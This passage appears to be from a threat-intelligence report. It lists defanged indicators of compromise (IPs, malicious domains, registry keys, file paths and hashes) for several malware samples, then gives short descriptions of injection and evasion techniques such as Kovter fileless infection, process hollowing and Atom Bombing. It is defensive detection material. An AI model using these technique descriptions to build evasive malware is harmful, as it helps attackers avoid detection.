N/A	-

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`239[.]255[.]255[.]250`	17
`69[.]55[.]5[.]250`	17
`192[.]0[.]47[.]59`	16
`144[.]76[.]199[.]43`	15
`176[.]111[.]49[.]43`	15
`46[.]4[.]52[.]109`	15
`144[.]76[.]199[.]2`	15
`85[.]25[.]119[.]25`	15
`43[.]231[.]4[.]7`	15
`172[.]217[.]164[.]132`	15
`94[.]23[.]27[.]38`	15
`216[.]146[.]35[.]35`	14
`208[.]76[.]51[.]51`	13
`172[.]217[.]192[.]26`	13
`74[.]6[.]141[.]40`	13
`212[.]82[.]101[.]46`	12
`98[.]136[.]96[.]73`	12
`98[.]136[.]101[.]116`	12
`67[.]195[.]228[.]87`	12
`66[.]218[.]85[.]151`	12
`213[.]205[.]33[.]63`	12
`98[.]137[.]157[.]43`	12
`87[.]250[.]250[.]89`	12
`74[.]125[.]193[.]26`	12
`172[.]217[.]6[.]228`	11
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`250[.]5[.]55[.]69[.]in-addr[.]arpa`	17
`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org`	17
`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org`	17
`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net`	17
`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net`	17
`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org`	17
`microsoft-com[.]mail[.]protection[.]outlook[.]com`	17
`whois[.]iana[.]org`	16
`whois[.]arin[.]net`	16
`sweety2001[.]dating4you[.]cn`	16
`honeypus[.]rusladies[.]cn`	16
`katarinasw[.]date4you[.]cn`	16
`marina99[.]ruladies[.]cn`	16
`mx-aol[.]mail[.]gm0[.]yahoodns[.]net`	13
`hotmail-com[.]olc[.]protection[.]outlook[.]com`	13
`mx1[.]emailsrvr[.]com`	13
`aol[.]com`	13
`mx-eu[.]mail[.]am0[.]yahoodns[.]net`	12
`tiscali[.]it`	12
`mxs[.]mail[.]ru`	12
`mx[.]yandex[.]net`	12
`mx[.]yandex[.]ru`	12
`msx-smtp-mx2[.]hinet[.]net`	12
`tiscalinet[.]it`	11
`inmx[.]rambler[.]ru`	11
See JSON for more IOCs

Files and or directories created	Occurrences
`%SystemRoot%\SysWOW64\config\systemprofile:.repos`	17
`%SystemRoot%\SysWOW64\config\systemprofile`	17
`%HOMEPATH%`	15
`%SystemRoot%\SysWOW64\wpdjiqwl`	3
`%SystemRoot%\SysWOW64\gzntsagv`	2
`%SystemRoot%\SysWOW64\athnmuap`	2
`%SystemRoot%\SysWOW64\slzfemsh`	2
`%TEMP%\utjfmin.exe`	1
`%TEMP%\evorylxw.exe`	1
`%TEMP%\gstniefc.exe`	1
`%TEMP%\otggjiyd.exe`	1
`%TEMP%\edtpwsx.exe`	1
`%TEMP%\uutzkyfi.exe`	1
`%TEMP%\rlnkeakp.exe`	1
`%TEMP%\azlhmwgt.exe`	1
`%TEMP%\wytkbvcv.exe`	1
`%TEMP%\uboorcup.exe`	1
`%TEMP%\uxffdbfo.exe`	1
`%TEMP%\ondzgch.exe`	1
`%TEMP%\arknuhts.exe`	1
`%TEMP%\tyllondi.exe`	1
`%TEMP%\qpfbiej.exe`	1
`%TEMP%\jhokjsqh.exe`	1
`%TEMP%\lkwsxhre.exe`	1
`%TEMP%\pjlicyin.exe`	1
See JSON for more IOCs

File Hashes

116bb71b6e6866ba5862d18e5361fe70ad2f9adb3ed8f5f1606e2561bff9fa79
2b9c74a2ffb4d1164048adec4381d151922244be8855026bff683abbf4122684
397ad676785c8e47422e723c081e44172dd935bcfe1389a039ac4bb1013c50c0
59639b75a9ebe2fdcf6ec9623454f06455a5fa6f0a23e47cece96d98c8c0f324
650c6dae8c1553d599d15e7c3d2235a393f498b743538674c7a1d87a8b627d90
7b962ff72c455f123c5ee0ba29aeea11e6fa23d595a0be8aad7b0235d5280d79
85bd864d585a37662a1c6a28daef2ac8c97996e52bf37209e76b0a8a9d6494e1
a1fd580e38af18c70ede2540e309a513e85b9a06423aee45f35fbbf1bfa517b9
a94cea85efa1c6842892248e1724cd17fb66a34435c9797d9809c3e25a5e6770
bad0767a0cf7088aed7904551b26bafd66b4bbc1257518275a1b277f27d1f7a9
c3bb4a36939e8f6d2acf8b57b0676ca8c7bafea33cfd15bedecf192f0610e6e9
c5ed772f6cb0aa202fb87049bd20063741fd62023f7d9c924876e28711dab3f2
de76a7d7af2c38342333014608b75117a2d1868d9020f62fdd117cdfb5ed30fa
e1cfadc86259f90b2f1fb5cd23bd267a94ed8c8a2d72035b6e335fd5e68d5866
ec4960b3885c4bb63032883cd088585e4f347c4ac9659f49982f999775d90a21
f1e790bcc0711047ab255646e07ef7d2fb644c45b24a4bc67250e2c8ee9318a1
f7699a1eafb0aded81818b28fd1c897e3e2e22d9d7b4297d97654a5aca09da49

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Yobrowser-6992453-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\Software\Microsoft\RestartManager\Session0000`	33
`<HKCU>\SOFTWARE\MICROSOFT\RESTARTMANAGER\SESSION0000 Value Name: Sequence`	33
`<HKCU>\SOFTWARE\MICROSOFT\RestartManager`	33
`<HKCU>\SOFTWARE\MICROSOFT\RESTARTMANAGER\SESSION0000 Value Name: Owner`	33
`<HKCU>\SOFTWARE\MICROSOFT\RESTARTMANAGER\SESSION0000 Value Name: SessionHash`	33

Mutexes	Occurrences
`Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000`	33
`Local\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511`	33

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Files and or directories created	Occurrences
`%LOCALAPPDATA%\Programs`	33
`%LOCALAPPDATA%\Programs\Common`	33
`%TEMP%\is-C6FN7.tmp\32dfee8be7cca7d0ed5b84fe8deff6d7177042a802586d16c26176ec58952309.tmp`	1
`%TEMP%\is-9HDTO.tmp\_isetup\_setup64.tmp`	1
`%TEMP%\is-9HDTO.tmp\_isetup\_shfoldr.dll`	1
`%TEMP%\is-9HDTO.tmp\trithiweate.dll`	1
`%TEMP%\is-7CPIN.tmp\36ca931623f279c6683ace47e425666510034f5e18441f90e895a3fc6cd2bbdb.tmp`	1
`%TEMP%\is-0142V.tmp\_isetup\_setup64.tmp`	1
`%TEMP%\is-0142V.tmp\_isetup\_shfoldr.dll`	1
`%TEMP%\is-0142V.tmp\trithiweate.dll`	1
`%TEMP%\is-CRK4O.tmp\42827e85051a54995e67aeb54b9418968224f6c299887e4afca574e08b2b76c1.tmp`	1
`%TEMP%\is-Q964A.tmp\482675e5774d1714ae17b5daefd13697fe3a921feb20fc4360065c2135b9c7b0.tmp`	1
`%TEMP%\is-9AA9G.tmp\3f2c22316bc2184f740f39499e41002c6d525a2c4c18dd0b9170c90410a5e4d1.tmp`	1
`%TEMP%\is-T68TS.tmp\4a55c9ceaa100182f6fc1ce9c8ec3c0f9eb58b7841c46c7d1d66fa5eaa4f410e.tmp`	1
`%TEMP%\is-8V9B2.tmp\_isetup\_setup64.tmp`	1
`%TEMP%\is-8V9B2.tmp\_isetup\_shfoldr.dll`	1
`%TEMP%\is-8V9B2.tmp\trithiweate.dll`	1
`%TEMP%\is-P9KOG.tmp\_isetup\_setup64.tmp`	1
`%TEMP%\is-P9KOG.tmp\_isetup\_shfoldr.dll`	1
`%TEMP%\is-FPHCP.tmp\_isetup\_setup64.tmp`	1
`%TEMP%\is-P9KOG.tmp\trithiweate.dll`	1
`%TEMP%\is-FPHCP.tmp\_isetup\_shfoldr.dll`	1
`%TEMP%\is-FPHCP.tmp\trithiweate.dll`	1
`%TEMP%\is-3SHVR.tmp\_isetup\_setup64.tmp`	1
`%TEMP%\is-3SHVR.tmp\_isetup\_shfoldr.dll`	1
See JSON for more IOCs

File Hashes

02be7ea7484ce02344237e4aab046aaa3af0f67f5b5bc7530b7757c182008374
0912999b354d903202f981d327670d3dd5a6f37f3c3374cfbf29b9d5dce86e5a
0bd58e14131755d1671174225ea1349a9c9ca54e76a29c2696aab762859ed6ea
1150e22d4d164cd9a07ee28a6c6d33e657e10e1af6f06a3423c56a5f0449b02c
1609b08dc860872a1a37967ec01e9c8d90813e42f4c32a4a5c7651b226bf1c7f
16ee969920278d950596ee85505d40ed1b4265d6fdfa35dc55dd6d188c432614
18c140ae4eb5f0bdff9f07ba176fba6873e5359ff689145bf4d41defec9f635f
224b4f9f98e7d9887ebcae15c02d8973264f31d12ff87a30d696139a316e2cf9
259546449e9e630fbe3bdcfbda7c51de9c1e7bb93022bda08d89bea95ad23a24
26b5593a4e7c8b5accf97029cf6c646c7769cecd36d105153f228f03a20f24be
2e39806e189e988a6bb094359db5aab14638a1737fded6ab00095425672aa13d
2fc0b64cf4ab9d6a6a3b607b999b1e47551bfb62acf143bd08faebf0485157d7
32dfee8be7cca7d0ed5b84fe8deff6d7177042a802586d16c26176ec58952309
36c8f82ff5ebd1647044f14b83dbfb93e1ad5e8e80d95cb2f6e3f463cf4ac94e
36ca931623f279c6683ace47e425666510034f5e18441f90e895a3fc6cd2bbdb
3f2c22316bc2184f740f39499e41002c6d525a2c4c18dd0b9170c90410a5e4d1
42827e85051a54995e67aeb54b9418968224f6c299887e4afca574e08b2b76c1
482675e5774d1714ae17b5daefd13697fe3a921feb20fc4360065c2135b9c7b0
4843bffb11be8da31b059e63973b2f97a3a093cf80b537cb19629f49099a35c4
4a55c9ceaa100182f6fc1ce9c8ec3c0f9eb58b7841c46c7d1d66fa5eaa4f410e
4f349d22bc1cb7e4defbd97debebe906a5408351e7069cf5cc2333338d5be8ed
5677386b0050cff2f5a2c12430999d569dc744944f2f2d9c29f3bab6d5d43edf
5ca1ade829002a58684dc8ff37b11e7b07d91b61a26d89a6736f884d14a0d00f
5ddbe11ee1e50f6a198f1e331e55621fcfc02870f6e8b4e4d5d171bf008938b5
64543ddc78b58da0236310fcee0b447e153d94a4cd393c1975bbe6b000acc960
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Exprev

Madshi injection detected (3267)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Kovter injection detected (2041)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Process hollowing detected (1016)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected (676)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Dealply adware detected (284)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Gamarue malware detected (197)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
PowerShell file-less infection detected (53)
A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
Atom Bombing code injection technique detected (45)
A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
Fusion adware detected (35)
Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware.
Installcore adware detected (32)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.

↧